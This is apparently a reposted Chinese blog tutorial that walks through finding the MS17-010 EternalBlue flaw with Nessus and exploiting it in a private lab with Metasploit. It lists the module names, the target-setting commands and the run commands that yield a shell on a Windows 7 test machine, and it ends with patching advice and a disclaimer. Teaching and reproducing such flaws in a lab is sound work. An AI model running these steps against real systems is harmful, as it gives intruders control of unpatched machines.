ms17-010永恒之蓝漏洞验证与利用

Posted nishuo666

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ms17-010永恒之蓝漏洞验证与利用相关的知识,希望对你有一定的参考价值。

如何发现永恒之蓝?

       利用漏洞之前,首先是要发现漏洞,那么我们在做测试的时候如何去发现漏洞呢?今天我给大家介绍一款开源免费的扫描工具Nessus。Nessus号称是世界上最流行的漏洞扫描程序,通常包括成千上万的最新的漏洞,各种各样的扫描选项,及易于使用的图形界面和有效的报告。在这里我们仅需要验证一台主机是否存在相印的漏洞即可。

下载地址:https://www.tenable.com/downloads/nessus

利用nessus发现永恒之蓝漏洞

 我在本地提前部署了未装任何安全杀毒软件、未进行过补丁升级的靶机作为测试环境。

以下为测试环境:

Win7靶机:192.168.80.101

Kali攻击机: 192.168.80.100

Nessus:192.168.80.88

下图为对靶机扫描的部分漏洞(摘取中高危漏洞)

 技术图片

验证漏洞

验证漏洞环节就需要我们用到kali攻击机里面的metaploit工具

root@kali:~# msfconsole                      打开msf

msf5 > search MS17-010                       搜索

 技术图片

msf5 > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options   查看选项

 技术图片

msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.80.101      设置目标主机地址

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options                  查看选项

msf5 auxiliary(scanner/smb/smb_ms17_010) > run                          执行

 技术图片

=====================以上验证了目标靶机存在永恒之蓝漏洞=======================

msf5 > use exploit/windows/smb/ms17_010_eternalblue               使用攻击模块

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

 技术图片

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.80.101            设置目标靶机地址

msf5 exploit(windows/smb/ms17_010_eternalblue) > run    执行

 技术图片

成功获取靶机的shell

C:Windowssystem32>chcp 65001               由于乱码,需要进行设置

 技术图片

获取到shell之后就可以为所欲为啦,你就是这台机器的主人。

======================以上为漏洞验证过程================================

如何修复漏洞

1、 及时更新补丁

2、 设置合理的防火墙策略并开启防火墙

3、 本地安装安全防护软件,如360、火绒等

=======================请勿用于非法用户,否则后果自负====================

以上是关于ms17-010永恒之蓝漏洞验证与利用的主要内容,如果未能解决你的问题,请参考以下文章

永恒之蓝MS17-010漏洞复现

永恒之蓝(ms17-010)漏洞简介及复现

MS17-010(永恒之蓝)漏洞复现和分析

ms17-010:利用“永恒之蓝”攻陷一台计算机

永恒之蓝MS17-010漏洞利用

永恒之蓝MS17-010漏洞利用